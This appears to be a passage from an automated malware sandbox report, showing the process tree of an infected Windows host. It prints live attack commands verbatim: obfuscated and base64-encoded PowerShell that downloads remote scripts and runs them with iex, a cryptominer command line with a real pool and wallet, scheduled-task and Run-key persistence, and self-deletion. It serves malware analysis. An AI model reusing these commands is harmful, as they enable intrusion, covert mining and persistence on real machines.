        "C:\Users\Admin\AppData\Roaming\8648482.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4560
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4560 -s 2004
        7⤵
        Program crash
        
        PID:5736
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri15af75ee9b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1300
    - - C:\Users\Admin\AppData\Local\Temp\7zS8D930F44\Fri15af75ee9b.exe
        
        Fri15af75ee9b.exe
        5⤵
        Executes dropped EXE
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1544
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c APPNAME7.exe
      4⤵
      PID:3180
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri1553f0ee90.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2068
    - - C:\Users\Admin\AppData\Local\Temp\7zS8D930F44\Fri1553f0ee90.exe
        
        Fri1553f0ee90.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:744
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:1736
        
        C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
        7⤵
        Executes dropped EXE
        
        PID:4124
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        8⤵
        
        PID:5392
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:2220
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        "C:\Users\Admin\AppData\Roaming\services64.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4432
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        9⤵
        
        PID:4420
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        10⤵
        Creates scheduled task(s)
        
        PID:6516
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        9⤵
        Executes dropped EXE
        
        PID:5732
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
        9⤵
        
        PID:6964
        
        C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
        
        "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4184
        
        C:\Users\Admin\AppData\Roaming\2542790.exe
        
        "C:\Users\Admin\AppData\Roaming\2542790.exe"
        8⤵
        
        PID:4012
        
        C:\Users\Admin\AppData\Roaming\3224221.exe
        
        "C:\Users\Admin\AppData\Roaming\3224221.exe"
        8⤵
        Executes dropped EXE
        Suspicious behavior: SetClipboardViewer
        
        PID:4788
        
        C:\Users\Admin\AppData\Roaming\7795918.exe
        
        "C:\Users\Admin\AppData\Roaming\7795918.exe"
        8⤵
        Executes dropped EXE
        
        PID:4964
        
        C:\Users\Admin\AppData\Roaming\3870284.exe
        
        "C:\Users\Admin\AppData\Roaming\3870284.exe"
        8⤵
        Executes dropped EXE
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        
        PID:5184
        
        C:\Users\Admin\AppData\Roaming\1558333.exe
        
        "C:\Users\Admin\AppData\Roaming\1558333.exe"
        8⤵
        Executes dropped EXE
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        Executes dropped EXE
        
        PID:4376
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 800
        8⤵
        Drops file in Windows directory
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4956
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 812
        8⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:4976
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 884
        8⤵
        Program crash
        
        PID:4596
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 900
        8⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:5080
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 864
        8⤵
        Program crash
        
        PID:5172
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4376 -s 976
        8⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4256
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4256 -s 1528
        8⤵
        Program crash
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3756
        
        C:\Users\Admin\AppData\Local\Temp\Pubdate.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Pubdate.exe"
        7⤵
        Executes dropped EXE
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        7⤵
        Executes dropped EXE
        
        PID:4932
        
        C:\Users\Admin\AppData\Local\Temp\is-4RUF9.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4RUF9.tmp\setup_2.tmp" /SL5="$1020E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4988
        
        C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        9⤵
        Executes dropped EXE
        
        PID:3008
        
        C:\Users\Admin\AppData\Local\Temp\is-7I1PN.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7I1PN.tmp\setup_2.tmp" /SL5="$20220,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        10⤵
        Executes dropped EXE
        Loads dropped DLL
        Drops file in Program Files directory
        Suspicious use of FindShellTrayWindow
        
        PID:4240
        
        C:\Users\Admin\AppData\Local\Temp\is-9PKII.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-9PKII.tmp\postback.exe" ss1
        11⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4728
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        12⤵
        
        PID:4152
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        13⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        14⤵
        Blocklisted process makes network request
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\9hzhl0gUw.exe
        
        "C:\Users\Admin\AppData\Local\Temp\9hzhl0gUw.exe"
        13⤵
        Executes dropped EXE
        
        PID:6996
        
        C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe"
        14⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:7092
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        15⤵
        
        PID:6408
        
        C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\
        16⤵
        
        PID:7016
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\8aa75ad8ab\rnyuf.exe" /F
        15⤵
        Creates scheduled task(s)
        
        PID:5728
        
        C:\Users\Admin\AppData\Local\Temp\vildo\vildo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vildo\vildo.exe"
        15⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5644
        
        C:\Users\Admin\AppData\Local\Temp\vildo.exe
        
        C:\Users\Admin\AppData\Local\Temp\vildo.exe
        16⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks processor information in registry
        
        PID:4108
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im vildo.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\vildo.exe" & del C:\ProgramData\*.dll & exit
        17⤵
        
        PID:2388
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im vildo.exe /f
        18⤵
        Kills process with taskkill
        
        PID:6520
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        18⤵
        Delays execution with timeout.exe
        
        PID:5476
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\123\123.cmd" "
        15⤵
        
        PID:2108
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA
        16⤵
        Blocklisted process makes network request
        
        PID:4828
        
        C:\Windows\SysWOW64\wscript.exe
        
        "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs
        17⤵
        
        PID:6800
        
        C:\Users\Admin\AppData\Local\Temp\dvr9Exz0c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\dvr9Exz0c.exe"
        13⤵
        Executes dropped EXE
        
        PID:6204
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe"
        7⤵
        Executes dropped EXE
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\3002.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
        8⤵
        Executes dropped EXE
        
        PID:5548
        
        C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
        
        "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
        7⤵
        Executes dropped EXE
        
        PID:4320
        
        C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
        7⤵
        
        PID:4728

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s BITS
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:668
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k SystemNetworkService
  2⤵
  - Drops file in System32 directory
  - Checks processor information in registry
  - Modifies data under HKEY_USERS
  PID:4868

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:4408
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2096

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5712
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:5744

C:\Users\Admin\AppData\Local\Temp\5063.exe
C:\Users\Admin\AppData\Local\Temp\5063.exe
1⤵
- Executes dropped EXE
- Drops startup file
PID:5708
- C:\ProgramData\Systemd\Database.exe
  NULL
  2⤵
  - Executes dropped EXE
  PID:6696

C:\Users\Admin\AppData\Local\Temp\63FB.exe
C:\Users\Admin\AppData\Local\Temp\63FB.exe
1⤵
- Executes dropped EXE
- Drops startup file
PID:4692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /K taskkill /IM Database.exe /F && exit
  2⤵
  PID:4912
- - C:\Windows\system32\taskkill.exe
    taskkill /IM Database.exe /F
    3⤵
    - Kills process with taskkill
    PID:6456
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
  2⤵
  PID:4940

C:\Windows\ImmersiveControlPanel\SystemSettings.exe
"C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel
1⤵
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:6240

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6284

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
PID:6444
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding D1AD3E2E6960C44E2C8B3AF60808BAF0 C
  2⤵
  - Loads dropped DLL
  PID:6556
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding CC0BC607903063C3561EFAC3EB4D8104
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:6080
- - C:\Windows\SysWOW64\taskkill.exe
    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
    3⤵
    - Kills process with taskkill
    PID:5164
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 4F7D0D4943CCE2014CF8296BA3EAB79F E Global\MSI0000
  2⤵
  - Loads dropped DLL
  PID:5140

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:6620

C:\Users\Admin\AppData\Local\Temp\8918.exe
C:\Users\Admin\AppData\Local\Temp\8918.exe
1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6836

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:6392
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  - Loads dropped DLL
  PID:6888

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6972

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
PID:7072

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:6468

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
"C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe"
1⤵
- Modifies system executable filetype association
- Checks processor information in registry
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4756
- C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
  "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe" /update /restart
  2⤵
  - Executes dropped EXE
  PID:4812
- - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe
    C:\Users\Admin\AppData\Local\Microsoft\OneDrive\Update\OneDriveSetup.exe /update /restart /peruser /childprocess /extractFilesWithLessThreadCount /renameReplaceOneDriveExe /renameReplaceODSUExe /removeNonCurrentVersions
    3⤵
    - Modifies system executable filetype association
    - Executes dropped EXE
    - Adds Run key to start application
    - Modifies Internet Explorer settings
    - Modifies registry class
    PID:6480
  - - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe
      "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\21.150.0725.0001\FileSyncConfig.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Modifies registry class
      PID:2056
  - - C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe
      /updateInstalled /background
      4⤵
      Modifies system executable filetype association
      Loads dropped DLL
      Modifies Internet Explorer settings
      Modifies registry class
      Suspicious behavior: AddClipboardFormatListener
      Suspicious use of FindShellTrayWindow
      Suspicious use of SetWindowsHookEx
      PID:7004
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 3008
        5⤵
        Program crash
        
        PID:6632
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7004 -s 3024
        5⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Program crash
        
        PID:5448

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s fdPHost
1⤵
PID:5376

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:404

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:5960

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5296

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3904

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4728

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:1924

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:6924

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4392

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2132

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4548

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:6952

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:3988

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:1128

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5148

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1052

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:1300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6736

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6384

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6728

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6864

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3844

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:744

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6256

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6848

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6360

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
